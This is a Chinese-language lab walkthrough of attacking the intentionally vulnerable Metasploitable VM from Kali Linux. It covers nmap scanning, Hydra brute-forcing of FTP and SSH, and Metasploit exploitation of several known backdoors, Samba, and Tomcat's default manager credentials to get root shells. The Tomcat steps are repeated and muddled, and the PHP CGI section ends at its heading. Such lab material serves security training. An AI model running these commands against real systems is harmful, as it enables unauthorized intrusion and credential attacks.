kali渗透metasploitable靶机
系統簡介:
Metasploitable是一個虛擬機文件,從網上下載解壓之后就可以直接使用,無需安裝。
靶機下載鏈接:http://downloads.metasploit.com/data/metasploitable/metasploitable-linux-2.0.0.zip
如何開始:
虛擬機設置完畢后,就可以登錄Metasploitable啦,用戶名是:msfadmin密碼是:msfadmin.
在shell中執行ifconfig命令來查看你的IP 地址.
開啟的服務:
nmap 192.168.195.133
端口爆破:FTP、SSH等
工具:Hydra
備用字典
后面會用到tomcat 也可以加進去
將字典傳到桌面上
一、爆破FTP
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt ftp://192.168.195.133
二、爆破SSH
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.195.133 ssh
遠程連接進行測試
成功連接
三、端口滲透:
利用metasploit
然后在kali linux中進行滲透:
啟動msf msfconsole
端口1: 6667——-irc_3281_backdoor
登錄msf search irc 找到對應得模塊
進入對應模塊 查看配置 show options
設置主機名 進行漏洞利用 exploit 利用 ,
成功獲取會話,root權限
端口2 、6200——-vsftpd_234_backdoor
利用metasploit
找到利用模塊
切換模塊 查看配置
反彈會話,root權限
端口3、1524——-ingrelock_backdoor
利用telnet連接1524,直接返回root會話
端口4、1099——-distcc程序漏洞—-ingrelock
利用metasploit
返回對話
端口5、139——-samba為3.0漏洞
先用nmap進行詳細掃描
nmap -v -A -T4 192.168.195.133
metasploit有眾多掃描模塊,以適應不同的需要。在metasploit中同樣可以使用nmap進行掃描。在命令行中直接鍵入指令即可。
Samba
利用metasploit
端口6、8180——-Apache Tomcat弱口令
在終端中輸入命令“nmap –sV 192.168.195.133”,對目標主機進行端口掃描,發現開放8180端口并且運行著ApacheTomcat/CoyoteJSP engine1.1。 在終端中輸入命令“msfconsole”,啟動MSF終端。 在終端下輸入命令“search tomcat”, 搜索tomcat的相關工具和攻擊載荷。 在終端輸入“use auxiliary/scanner/http/tomcat_mgr_login”, 啟用漏洞利用模塊, 提示符就會提示進入到該路徑下。 在終端下輸入“set RHOSTS 192.168.195.133”,設置攻擊目標主機IP。 在終端下輸入“set RPORT 8180”,設置攻擊目標主機端口號. 在終端下輸入“exploit”, 實施攻擊。獲得用戶名tomcat,密碼tomcat。 在終端下輸入“use exploit/multi/http/tomcat_mgr_deploy”, 啟用漏洞利用模塊, 提示符就會提示進入到該路徑下。 在終端下輸入“set RHOST 192.168.195.133”,設置攻擊的目標主機IP。 在終端下輸入“set RPORT 8180”,設置攻擊的目標主機端口號。 在終端下輸入“set username tomcat”,設置攻擊時使用的登錄賬號tomcat。 在終端下輸入“set userpassword tomcat”,設置攻擊時使用的密碼tomcat。 在終端下輸入“exploit”,開始攻擊,建立會話。 在終端下輸入“getuid”,查看獲取的用戶權限。
在終端中輸入命令“nmap –sV 192.168.1.3”,對目標主機進行端口掃描,發現開放8180端口并且運行著ApacheTomcat/CoyoteJSP engine1.1。
在終端下輸入命令“search tomcat”, 搜索tomcat的相關工具和攻擊載荷。
在終端輸入“use auxiliary/scanner/http/tomcat_mgr_login”, 啟用漏洞利用模塊, 提示符就會提示進入到該路徑下。
use auxiliary/scanner/http/tomcat_mgr_login”, 啟用漏洞利用模塊, 提示符就會提示進入到該路徑下。
set RHOSTS 192.168.1.3”,設置攻擊目標主機IP、 “set RPORT 8180”,設置攻擊目標主機端口號
在終端下輸入“exploit”, 實施攻擊。獲得用戶名tomcat,密碼tomcat。
使用use auxiliary/scanner/http/tomcat_mgr_login進行賬戶爆破
用默認自帶的字典即可,如果用桌面上字典 則需要設置set PASS_FILE 'root/Desktop/password.txt' & set USER_FILE 'root/Desktop/user.txt'
search tomcat ,
show options
在終端下輸入“set RHOST 192.168.195.133”,設置攻擊的目標主機IP。
在終端下輸入“set RPORT 8180”,設置攻擊的目標主機端口號。
在終端下輸入“set username tomcat”,設置攻擊時使用的登錄賬號tomcat。
在終端下輸入“set password tomcat”,設置攻擊時使用的密碼tomcat。
在終端下輸入“exploit”,開始攻擊,建立會話。
端口7、80——-PHP CGI參數注入執行漏洞
參考鏈接:
https://blog.csdn.net/weixin_42432317/article/details/90208213
https://blog.csdn.net/zxchhyg/article/details/70048140
總結
以上是生活随笔為你收集整理的kali渗透metasploitable靶机的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: SAP UI5 应用开发教程之六十四 -
- 下一篇: 三层交换机静态路由配置实现两网互通